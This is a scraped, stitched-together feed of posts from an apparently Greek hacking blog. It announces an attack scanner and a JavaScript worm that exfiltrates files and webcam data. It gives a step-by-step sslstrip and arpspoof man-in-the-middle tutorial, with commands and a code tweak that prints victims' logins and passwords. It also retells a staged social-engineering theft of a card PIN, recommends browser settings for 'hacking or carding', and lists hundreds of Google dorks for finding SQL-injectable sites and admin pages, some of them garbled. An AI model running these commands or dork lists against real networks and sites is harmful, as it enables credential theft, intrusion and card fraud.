                    <a href="#">
                        <i class="fa fa-font fa-2x"></i>
                        <span class="nav-text">
                            Typography and Icons
                        </span>
                    </a>
                </li>
                <li>
                   <a href="#">
                       <i class="fa fa-table fa-2x"></i>
                        <span class="nav-text">
                            Tables
                        </span>
                    </a>
                </li>
                <li>
                   <a href="#">
                        <i class="fa fa-map-marker fa-2x"></i>
                        <span class="nav-text">
                            Maps
                        </span>
                    </a>
                </li>
                <li>
                    <a href="#">
                       <i class="fa fa-info fa-2x"></i>
                        <span class="nav-text">
                            Documentation
                        </span>
                    </a>
                </li>
            </ul>
            <ul class="logout">
                <li>
                   <a href="#">
                         <i class="fa fa-power-off fa-2x"></i>
                        <span class="nav-text">
                            Logout
                        </span>
                    </a>
                </li>
            </ul>
        </nav>
  </body>
    </html>

LIVE DEMO

Δίκτυα video - Part 5

$
0
0

ParanoicScan

$
0
0


Vulnerability Scanner

As the first program of 2014 I bring you the new version of my ParanoicScan in its version 1.7, while some people stole the source code of the previous version of this program code, the issue is that not bother me that you used the code but only changed him the program name and the name of the author did not bother to change the names of the variables only changed the name of the author, for a moment hesitate to continue to share the code of this 2-year project working but despite that I continue to share the code of this program, besides explorer (of perlenespanol) recommended me to do another version of this program was to demonstrate that the real author so that the program has the dual function and arrange countless bugs that were in all the code.


[++] Old Options


Google & Bing Scanner that also scan :

XSS

SQL GET / POST

SQL GET

SQL GET + Admin

Directory listing

MSSQL

Jet Database

Oracle

LFI

RFI

Full Source Discloure

HTTP Information

SQLi Scanner

Bypass Admin

Exploit FSD Manager

Paths Finder

IP Locate

Crack MD5

Panel Finder

Console


[++] Fixes


[+] Refresh of existing pages to crack md5
[+] Error scanner fsd
[+] Http error scanner scan
[+] Spaces between text too annoying
[+] Added array to bypass
[+] Failed to read from file


[++] New options


[+] Generate all logs in a html file
[+] Incorporates random and new useragent
[+] Multi encoder / decoder :

Ascii

Hex

Url

Bin To Text & Text To Bin


[+] PortScanner
[+] HTTP FingerPrinting
[+] CSRF Tool
[+] Scan XSS
[+] Generator for XSS Bypass
[+] Generator links to tiny url
[+] Finder and downloader exploits on Exploit-DB
[+] Mysql Manager
[+] Tools LFI


An image :



An video :

Available for download here :


https://github.com/DoddyHackman/ParanoicScan
https://code.google.com/p/paranoicscan/source/browse/
https://sourceforge.net/projects/paranoicscan/?source=directory
http://pastebin.com/yKfJhCT2


PerlUpdated a year ago
Python/ParanoicScan 0.4Updated a year ago
ZipUpdated a year ago
.gitattributesVulnerability Scanner 3 years ago
.gitignoreVulnerability Scanner 3 years ago
README.md

Good Bye

The Little Doctor

$
0
0


Little Docter is a JavaScript worm that can exfiltrate files, microphone, webcam, and other data; first demo'd at Kiwicon X.

Setup


Install docker, then edit the docker-compose.yml to your liking and execute docker-compose up or if you've broght your own server just drop the main.js file into any origin you can.


server                                Randomized cache buster                      2 months ago
.gitignore                          First cut of the working webrtc module 2 months ago
README.md                  Added pretty picture                               2 months ago
docker-compose.yml        Randomized cache buster                      2 months ago
little-doctor.png                Added pretty picture                              2 months ago






Clone with HTTPS: https://github.com/infosec-au/little-doctor.git


SSL Strip on Mac OS X

$
0
0
First, we need to install the tools required, which are arpspoof and sslstrip. arpspoof comes with the dsniff suite and you can try to compile dsniff manually but I used macports to do it. Here are the steps I took :-

Installing arpspoof




    Make sure Xcode is installed. You can do this from the App Store.
  1. Make sure that Command Line Tools are installed.


  2. Download the installation package from macports here.
  3. Install it by opening and following through the installation. Straightforward.
  4. Open up a Terminal window.
  5. Do an update, by typing sudo port -d selfupdate
  6. Install dsniff, by typing sudo port install dsniff. The command should take a while but fail eventually. (may have changed, if it doesn't fail, skip to step 10.)
  7. One of the dependancies for dsniff is libnids. And one of the dependancies of libnids is libnet. It turns out that the default variant is libnids +libnet11, which will not work. So we need to uninstall libnids, and install the other variant. Do this with 

    • sudo port uninstall libnids
    • sudo port install libnids +libnet

  8. Try sudo port install dsniff again. It should work this time.
  9. arpspoof should have been installed. You can test it out from the Terminal window by typing arpspoof -h.

Installing sslstrip

  1. We need some python packages that are needed by sslstrip. Install them by typing this in a Terminal window

  • sudo port install python27 (optional?)
  • sudo port install py27-openssl
  • sudo port install py27-twisted-web2
  • sudo port install python_select (optional?)

  • Download sslstrip. I used the 0.9-2 version.
  • Decompress the archive.
  • sslstrip should now be working from the decompressed archive. You can test it out from the Terminal window by typing python sslstrip.py -h from the sslstrip-0.9.2 folder.
  • Getting ready to run

    1. Run the following commands. They allow you to use your mac to forward any incoming ip packets.

    • sudo sysctl -w net.inet.ip.forwarding=1
    • sudo sysctl -w net.inet.ip.fw.enable=1
    • sudo sysctl -w net.inet.ip.fw.verbose=1 (optional?)

  • At this point, you can choose to modify sslstripI preferred a cleaner output so I added in a try-catch at the following lines in the ServerConnection.py file.

  •             try:
                    HTTPClient.handleResponseEnd(self)
                except:
                    pass

    I also made some other changes. In particular, I made the log level to be debug mode, so I can see them from the log file generated, if I need to. Important data I made to print out from the console, such as urls, logins, and passwords.
  • We need to do port redirection of traffic. The usual packet firewall ipfw did not work - it was slated to be deprecated in Mountain Lion. Instead I used pf (for Packet Filter) instead. Make a backup of the file /etc/pf.conf, and save it somewhere, e.g. pf_mod.conf.
  • Specifically, we want to redirect all http traffic to our localhost at a specified port, say 8080. Insert the following line in the beginning of the file. This line says to redirect all incoming traffic from the interface en1, with any source and any destination address, but port 80 to localhost (127.0.0.1) on port 8080. Assuming en1 is the interface name you are using.

  • rdr pass on en1 proto tcp from any to any port 80 -> 127.0.0.1 port 8080

  • Run  sudo pfctl -e -f pf_mod.conf. This command enables the packet filter and to take its rules from the pf_mod.conf file.
    (To disable after you're done, simply do the same command with the backup file that you copied in step 3. You may also want to type
     sudo pfctl -d to disable the packet filter, if it was disabled in the first place.)
  • Start sslstrip by typing python sslstrip.py -p -k -l 8080 -w ./sslstrip.log.  Here, we are specifying that we only want to see secure post data, kill sessions, to listen at port 8080, and all output to be written to the file sslstrip.log. If run sucessfully, it should say that it is running.
  • Choose a target IP address, say 192.168.1.20. You can find this out using nmap. Also, find out now where your router is, say 192.168.1.1. You can find this out using netstat -rn, and looking at the default gateway. Now type in the following command in a new Terminal window.

  • arpspoof -i en1 -t 192.168.1.20 192.168.1.1

  • You should be getting your credentials in your sslstrip.log file, when the target logins to a secure website.
  • Credits to Moxie for sslstrip and Dug Song for arpspoof.

    via: techjots.blogspot.com

    Πως να βάλετε chat στην άκρη της σελίδας

    $
    0
    0


    Το chat θα είναι στα σταθερό και όταν τοποθετείται το βελάκια πάνω θα εμφανίζεται και το αντίστροφο πάμε να το δούμε:

    Αφού πρώτα κάνετε εγγραφη στο http://chatroll.com/αντιγράψτε τον παρακάτω κώδικα.





    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript">
    </script>
    <script type="text/javascript">
    //<!--
    $(document).ready(function() {$(".floatinglikebox").hover(function() {$(this).stop().animate({right: "0"}, "medium");}, function() {$(this).stop().animate({right: "-250"}, "medium");}, 500);});
    //-->
    </script>
    <style type="text/css">
    .floatinglikebox{background: url("http://4.bp.blogspot.com/-l377y75Cws4/UO3vKqxoPVI/AAAAAAAAAw0/v5eTdlLAdDw/s1600/chat.jpg") no-repeat scroll left center transparent !important;display: block;float: right;height: 270px;padding: 0 5px 0 29px;width: 245px;z-index: 99999;position:fixed;right:-250px;top:35%;}
    .floatinglikebox div{border:none;position:relative;display:block;}
    .floatinglikebox span{bottom: 10px;font: 10px tahoma,verdana,arial,sans-serif;position: absolute;right: 6px;text-align: right;z-index: 99999;}
    .floatinglikebox span a{color: #808080;text-decoration:none;}
    .floatinglikebox span a:hover{text-decoration:underline;}
    </style><div class="floatinglikebox" style=""><iframe width="100%" height="350" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" allowtransparency="true" src="http://chatroll.com/embed/chat/cn36?id=V1iodxlcCde&platform=blogger&w=$0"></iframe></div>

    Αντικαταστήστε το link με το δικό σας που το βρίσκουμε All Events  Το chat σας Settings – Basic


    θα το δούμε εδώ




    Αποθήκευση και τελειώσατε.

    Απορίες αν έχετε αφήστε το σχολειό σας!

    Social Engineering : Παράδειγμα

    $
    0
    0


    Αυτό το παράδειγμα είναι αυτούσιο από το βιβλίο Social Engineering The Art of Human Hacking του Christopher Hadnagy και θα το παραθέσω μεταφρασμένο.

    O C.H. λοιπόν μας μιλάει για την εμπειρία του όταν προσφέρθηκε να δείξει σε ένα show του BBC πόσο εύκολο θα ήταν όχι μόνο να κλέψει την τσάντα μιας γυναίκας και να πάρει την πιστωτική της κάρτα αλλά και τον κωδικό. Το BBC ασφαλώς είπε ότι αυτό δεν πρόκειται να συμβεί. Ο ίδιος με την ομάδα του ήξεραν ότι μπορούσαν να το κάνουν αφού είχαν αναφερθεί τέτοιου είδους απάτες.

    Για να διαδραματίσουν λοιπόν το "πείραμα"τους πήγαν σε μια τοπική καφετέρια. Η καφετέρια ήταν στον ψηλότερο όροφο ενώς πολυκαταστήματος στην Oxford Street. Ήταν σχεδόν άδειο και αυτός έκατσε σε ένα άδειο τραπέζι φορώντας ένα "επαγγελματικό"κουστούμι, άφησε τον χαρτοφύλακα του στο τραπέζι και περίμενε για το κατάλληλο θύμα. Μετά από λίγη ώρα το κατάλληλο θύμα έφτασε μαζί με ένα φίλο του και κάτσανε στο διπλανό τραπέζι και το θύμα (η γυναίκα) άφησε την τσάντα στην καρέκλα δίπλα και είχε όλη την ώρα πάνω από αυτήν το χέρι της όπως κάνουν οι περισσότερες γυναίκες.

    Ο ίδιος λέει ότι έπρεπε να κλέψει ολόκληρη την τσάντα της ενώ είχε το χέρι της συνέχεια από πάνω και ο φίλος της καθόταν ακριβώς απέναντι οπότε τα πράγματα άρχισαν να δυσκολεύουν. Μετά από λίγο όμως ο φίλος της πήγε στην τουαλέτα και τότε το θύμα έμεινε μόνο του. Ο C.Η. έδωσε το "σήμα"στον Alex και την Jess (μέλη της ομάδας).

    Αυτοί λοιπόν έπαιξαν το ρόλο του ζευγαριού και πήγαν και ζήτησαν από το θύμα να τους βγάλει μια φωτογραφία, και το θύμα ήταν ευπρόσδεκτο να το κάνει. Έβγαλε το χέρι της από την τσάντα για να πάρει την φωτογραφική και να βγάλει φωτογραφία το "Ευτυχισμένο ζευγάρι"και όσο το έκανε αυτό ο C.H. πλησίασε και πήρε την τσάντα της και την έβαλε ψύχραιμα στο χαρτοφύλακα του.

    Το θύμα δεν πρόσεξε ότι η καρέκλα ήταν άδεια και ο Alex με την Jess έφυγαν από την καφετέρια και ο Alex πήγε γρήγορα στο πάρκινγκ. Δεν πήρε πολύ στο θύμα για να καταλάβει ότι λείπει η τσάντα του και τότε άρχισε να πανικοβάλεται. Σηκώθηκε και κοίταξε τριγύρω με νευρικότητα. ( Αυτό ήταν που ευχόμασταν να συμβεί). Ο C.H. την ρώτησε αν χρειαζόταν βοήθεια και εκείνει τον ρώτησε αν είχε δει τίποτα. Ο ίδιος απάντησε πως δεν είδε τίποτα και την έπεισε να κάτσει κάτω να ηρεμήσει και να σκεφτεί τι ήταν μέσα στην τσάντα της. Το τηλέφωνο της, το make up, μερικά χρήματα και οι πιστωτικές της κάρτες!

    Στη συνέχεια την ρώτησε σε ποια τράπεζα είχε τις κάρτες και της είπε ότι δουλεύει σε αυτήν την τράπεζα. Τι μεγάλη τύχη! Την βεβαίωσε ότι όλα θα πάνε καλά, απλά έπρεπε να ακυρώσει τις κάρτες της αμέσως. Ο C.H. κάλεσε την "τράπεζα"που στην πραγματικότητα ήταν ο Alex και έδωσε το τηλέφωνο στο θύμα. Το πήρε και τότε ήταν πάνω στον Alex αν θα τα καταφέρει.

    Ο ίδιος ήταν σε ένα βανάκι στο πάρκινγκ και είχε βάλει ήχο από φασαρία γραφείου που είχε κατεβάσει από το ίντερνετ να παίζει. Ηρέμησε το θύμα και την επιβεβαίωσε ότι μπορεί εύκολα να ακυρώσει τις κάρτες της απλά θα έπρεπε να πληκτρολογίσει το Pin της κάρτας της στο πληκτρολόγιο του τηλεφώνου για να εξακριβώσει τα στοιχεία της.

    Όπως λέει ο C.H. : Το τηλέφωνο μου, και το πληκτρολόγιο μου.

    Μπορείτε να μαντάψετε τα υπόλοιπα. Μόλις πήραμε το PIN έφυγα και την άφησα με τον φίλο της και κατευθήνθηκα προς την πόρτα. Αν είμασταν πραγματικοί κλέφτες θα είχαμε πρόσβαση στο λογαριασμό της και θα μπορούσαμε να πάρουμε τα πάντα.

    Ευτυχώς γι αυτήν ήταν μόνο ένα TV show και ήταν χαρούμενη που όταν γύρισα της επέστρεψα της τσάντα και ήξερε ότι όλα ήταν ένα show. Με ευχαρίστησε ακόμα που της έδωσα την τσάντα και εγώ της απάντησα, Μην με ευχαριστείς, εγώ είμαι αυτός που στην έκλεψε.

    ΤΟ ΠΡΟΣΘΕΤΟ GHOSTERY ΔΙΝΕΙ ΤΑ ΣΤΟΙΧΕΙΑ ΜΑΣ ΣΤΙΣ ΕΤΑΙΡΕΙΕΣ ΔΙΑΦΗΜΙΣΗΣ!

    $
    0
    0



    Θα μπορούσαμε να το αποκαλέσουμε και κράχτη αφού αποτελεί ουσιαστικό μέρος της εργαλειοθήκης μας όταν είμαστε συνδεδεμένοι στο διαδίκτυο και προστατεύει την ιδιωτική μας ζωή.
    Αυτό που οι περισσότεροι χρήστες δεν συνειδητοποιούν, αναφέρει το περιοδικό MIT Technology Review, είναι ότι η Evidon που είναι μητρική εταιρεία της Ghostery, συλλέγει τα δεδομένα των χρηστών και τα πωλεί στους διαφημιστές.




    Θα πρέπει να καταστεί σαφές ότι αν επιλέξετε να ξεκλικάρετε την επιλογή για κοινή χρήση πληροφοριών εντός της Ghostery, τότε αυτομάτως αποκλείεται η συλλογή των δεδομένων σας και η Evidon συμμορφώνεται με τις πληροφορίες αυτού το αιτήματος.

    Ο συν-ιδρυτής και Διευθύνων Σύμβουλος της Evidon, ο Scott Meyer, λέει ότι δεν υπάρχει καμμία σύγκρουση των δύο ρόλων της εταιρείας του που διαδραματίζει έναν καίριο ρόλο καθώς προσφέρει στους χρήστες ένα εργαλείο που τους κρύβει από τον κλάδο της διαφήμισης ενώ παράλληλα παρέχει δεδομένα σχετικά με τους χρήστες σε διαφημιστικές εταιρείες.
    Οτιδήποτε δίνει στους ανθρώπους περισσότερη διαφάνεια και έλεγχο, είναι καλό για τη βιομηχανία, λέει ο Meyer.
    Η Evidon προωθεί δύο υπηρεσίες στους πελάτες της.
    Το πρώτο της προφίλ είναι αυτό που μπλοκάρει τον κώδικα παρακολούθησης των ιστοσελίδων, και επιτρέπει στους διαχειριστές του site να βλέπουν από πού προέρχεται η παρακολούθηση και πώς αυτή επηρεάζει την ταχύτητα των σελίδων τους. Το δεύτερο προφίλ της Evidon παρέχει στους διαφημιστές στατιστικά στοιχεία σχετικά με τον τρόπο που οι συνήθεις trackers άλλων εταιρειών, δηλαδή όλοι αυτοί οι… καλόβουλοι άνθρωποι που προσπαθούν να αντλήσουν τα δεδομένα μας, κινούνται στο Διαδίκτυο.

    Το πρώτο προφίλ, λέει ο Meyer, είναι πολύ σημαντικό, διότι οι ιδιοκτήτες συχνά δεν συνειδητοποιούν τι κώδικα παρακολούθησης χρησιμοποιούν για τους επισκέπτες τους οι άλλοι δικτυακοί τόποι. Είναι κάτι σύνηθες για τον χειριστή μιας ιστοσελίδας.

    Όχι βέβαια πως ο καθένας από εμάς μπορεί να είναι πεπεισμένος ότι η δυαδικότητα του ρόλου της Evidon που με το ένα πόδι προασπίζει την ιδιωτικότητα των καταναλωτών και με το άλλο πόδι δίνει τα στοιχεία τους στον κλάδο της διαφήμισης, είναι τόσο ακίνδυνη όσο ισχυρίζεται ο Meyer.

    Η Evidon πωλεί ένα σημαντικό ποσοστό των δεδομένων των χρηστών της σε εταιρείες διαφήμισης, θέλοντας να διασφαλίσει τη συμφωνία τους με το πρόγραμμα AdChoices.
    Το AdChoices υποτίθεται ότι υπάρχει για να βοηθήσει τους ανθρώπους να απαλλαγούν από στοχευμένες διαφημίσεις από τη στιγμή που θα επιλέξουν να μην έχουν ενεργοποιημένη την επιλογή αυτή.
    Την ίδια στιγμή, όμως, η Evidon έχει έννομο συμφέρον στο να επιδιώκει την επιτυχία του προγράμματος AdChoices, προκειμένου να ανταγωνιστεί άλλες εναλλακτικές λύσεις όπως το «Do Not Track», που έρχεται πλέον ως πρότυπο σε ορισμένα προγράμματα περιήγησης.

    geo.enabled = false
    geo.wifi.uri = [αφηστετο κενο]
    network.http.accept.default =text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    network.http.use-cache = false
    network.http.keep-alive.timeout = 600
    network.http.max-persistent-connections-per-proxy = 16
    network.proxy.socks_remote_dns = true
    network.cookie.lifetimePolicy = 2
    network.http.sendRefererHeader = 0
    network.http.sendSecureXSiteReferrer = false
    network.protocol-handler.external = false
    network.protocol-handler.warn-external = true
    network.http.pipelining = true
    network.http.pipelining.maxrequests = 8
    network.http.proxy.keep-alive = true
    network.http.proxy.pipelining = true
    network.prefetch-next = false
    browser.cache.disk.enable = false
    browser.cache.offline.enable = false
    browser.sessionstore.privacy_level = 2
    browser.sessionhistory.max_entries = 2
    browser.display.use_document_fonts = 0
    dom.storage.enabled = false
    extensions.blocklist.enabled = false




    Πρόσθετες Συστάσεις Ασφαλείας

    1 Απενεργοποίηση όλων τον plugins

    2- Απενεργοποίηση όλων τον update την ώρα του hack η του carding

    3 Απενεργοποίηση και καθαρισμός σε ότι έχει σχέση με ιστορικό

    Απαραίτητα Addons
    1. BetterPrivacy
    2. Close n forget
    3. Ghostery
    4. Https-Everywhere
    5. Modify Headers
    6. NoScript
    7. RefControl
    8. User Agent Switcher



    via: www.greekhacking.com

    via: www.osarena.net

    How to identify SQL injection & how to manual + automatic exploitation (GR)

    $
    0
    0

    Λίστα με dorks για sql injection

    $
    0
    0


    Mερικά dorks τα οποία μπορούμε να τα βάλουμε στο google και να κάνουμε αναζήτηση για ευπαθείς σελίδες στην sql injection.




    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurllay_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurlageid=
    inurl:games.php?id=
    inurlage.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=d=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:fiche_spectacle.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurltray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?av
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurlreview.php?id=
    inurl:loadpsb.php?id=
    inurlpinions.php?id=
    inurl:spr.php?id=
    inurlages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurlarticipant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurlrod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurlerson.php?id=
    inurlroductinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurlrofile_view.php?id=
    inurl:category.php?id=
    inurlublications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurlrod_info.php?id=
    inurl:shop.php?do=part&id=
    inurlroductinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurlroduct.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurlroduit.php?id=
    inurlop.php?id=
    inurl:shopping.php?id=
    inurlroductdetail.php?id=
    inurlost.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurlage.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurlroduct_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:tran******.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:review.php?id=
    inurl:loadpsb.php?id=
    inurl:ages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurlpinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurlffer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    inurl: info.php?id=
    inurl : pro.php?id=
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurllay_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurlageid=
    inurl:games.php?id=
    inurlage.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurltray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurlreview.php?id=
    inurl:loadpsb.php?id=
    inurlpinions.php?id=
    inurl:spr.php?id=
    inurlages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurlarticipant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurlrod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurlerson.php?id=
    inurlroductinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurlrofile_view.php?id=
    inurl:category.php?id=
    inurlublications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurlrod_info.php?id=
    inurl:shop.php?do=part&id=
    inurlroductinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurlroduct.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurlroduit.php?id=
    inurlop.php?id=
    inurl:shopping.php?id=
    inurlroductdetail.php?id=
    inurlost.php?id=
    inurl:viewshowdetail.php?id=
    inurl:clubpage.php?id=
    inurl:memberInfo.php?id=
    inurl:section.php?id=
    inurl:theme.php?id=
    inurlage.php?id=
    inurl:shredder-categories.php?id=
    inurl:tradeCategory.php?id=
    inurlroduct_ranges_view.php?ID=
    inurl:shop_category.php?id=
    inurl:tran******.php?id=
    inurl:channel_id=
    inurl:item_id=
    inurl:newsid=
    inurl:trainers.php?id=
    inurl:news-full.php?id=
    inurl:news_display.php?getid=
    inurl:index2.php?option=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:newsone.php?id=
    inurl:event.php?id=
    inurlroduct-item.php?id=
    inurl:sql.php?id=
    inurl:aboutbook.php?id=
    inurl:review.php?id=
    inurl:loadpsb.php?id=
    inurl:ages.php?id=
    inurl:material.php?id=
    inurl:clanek.php4?id=
    inurl:announce.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:viewapp.php?id=
    inurl:viewphoto.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:review.php?id=
    inurl:iniziativa.php?in=
    inurl:curriculum.php?id=
    inurl:labels.php?id=
    inurl:story.php?id=
    inurl:look.php?ID=
    inurl:newsone.php?id=
    inurl:aboutbook.php?id=
    inurl:material.php?id=
    inurlpinions.php?id=
    inurl:announce.php?id=
    inurl:rub.php?idr=
    inurl:galeri_info.php?l=
    inurl:tekst.php?idt=
    inurl:newscat.php?id=
    inurl:newsticker_info.php?idn=
    inurl:rubrika.php?idr=
    inurl:rubp.php?idr=
    inurlffer.php?idf=
    inurl:art.php?idm=
    inurl:title.php?id=
    inurl:shop+php?id+site:fr
    "inurl:admin.asp"
    "inurl:login/admin.asp"
    "inurl:admin/login.asp"
    "inurl:adminlogin.asp"
    "inurl:adminhome.asp"
    "inurl:admin_login.asp"
    "inurl:administratorlogin.asp"
    "inurl:login/administrator.asp"
    "inurl:administrator_login.asp"
    inurl:"id="& intext:"Warning: mysql_fetch_assoc()
    inurl:"id="& intext:"Warning: mysql_fetch_array()
    inurl:"id="& intext:"Warning: mysql_num_rows()
    inurl:"id="& intext:"Warning: session_start()
    inurl:"id="& intext:"Warning: getimagesize()
    inurl:"id="& intext:"Warning: is_writable()
    inurl:"id="& intext:"Warning: getimagesize()
    inurl:"id="& intext:"Warning: Unknown()
    inurl:"id="& intext:"Warning: session_start()
    inurl:"id="& intext:"Warning: mysql_result()
    inurl:"id="& intext:"Warning: pg_exec()
    inurl:"id="& intext:"Warning: mysql_result()
    inurl:"id="& intext:"Warning: mysql_num_rows()
    inurl:"id="& intext:"Warning: mysql_query()
    inurl:"id="& intext:"Warning: array_merge()
    inurl:"id="& intext:"Warning: preg_match()
    inurl:"id="& intext:"Warning: ilesize()
    inurl:"id="& intext:"Warning: filesize()
    inurl:"id="& intext:"Warning: require()
    inurl:index.php?id=
    inurl:trainers.php?id=
    inurl:login.asp
    index of:/admin/login.asp
    inurl:buy.php?category=
    inurl:article.php?ID=
    inurl:play_old.php?id=
    inurl:declaration_more.php?decl_id=
    inurl:pageid=
    inurl:games.php?id=
    inurl:page.php?file=
    inurl:newsDetail.php?id=
    inurl:gallery.php?id=
    inurl:article.php?id=
    inurl:show.php?id=
    inurl:staff_id=
    inurl:newsitem.php?num=
    inurl:readnews.php?id=
    inurl:top10.php?cat=
    inurl:historialeer.php?num=
    inurl:reagir.php?num=
    inurl:Stray-Questions-View.php?num=
    inurl:forum_bds.php?num=
    inurl:game.php?id=
    inurl:view_product.php?id=
    inurl:newsone.php?id=
    inurl:sw_comment.php?id=
    inurl:news.php?id=
    inurl:avd_start.php?avd=
    inurl:event.php?id=
    inurl:product-item.php?id=
    inurl:sql.php?id=
    inurl:news_view.php?id=
    inurl:select_biblio.php?id=
    inurl:humor.php?id=
    inurl:aboutbook.php?id=
    inurl:ogl_inet.php?ogl_id=
    inurl:fiche_spectacle.php?id=
    inurl:communique_detail.php?id=
    inurl:sem.php3?id=
    inurl:kategorie.php4?id=
    inurl:news.php?id=
    inurl:index.php?id=
    inurl:faq2.php?id=
    inurl:show_an.php?id=
    inurl:preview.php?id=
    inurl:loadpsb.php?id=
    inurl:opinions.php?id=
    inurl:spr.php?id=
    inurl:pages.php?id=
    inurl:announce.php?id=
    inurl:clanek.php4?id=
    inurl:participant.php?id=
    inurl:download.php?id=
    inurl:main.php?id=
    inurl:review.php?id=
    inurl:chappies.php?id=
    inurl:read.php?id=
    inurl:prod_detail.php?id=
    inurl:viewphoto.php?id=
    inurl:article.php?id=
    inurl:person.php?id=
    inurl:productinfo.php?id=
    inurl:showimg.php?id=
    inurl:view.php?id=
    inurl:website.php?id=
    inurl:hosting_info.php?id=
    inurl:gallery.php?id=
    inurl:rub.php?idr=
    inurl:view_faq.php?id=
    inurl:artikelinfo.php?id=
    inurl:detail.php?ID=
    inurl:index.php?=
    inurl:profile_view.php?id=
    inurl:category.php?id=
    inurl:publications.php?id=
    inurl:fellows.php?id=
    inurl:downloads_info.php?id=
    inurl:prod_info.php?id=
    inurl:shop.php?do=part&id=
    inurl:productinfo.php?id=
    inurl:collectionitem.php?id=
    inurl:band_info.php?id=
    inurl:product.php?id=
    inurl:releases.php?id=
    inurl:ray.php?id=
    inurl:produit.php?id=
    inurl:produit.php?id=+site:fr
    inurl:pop.php?id=
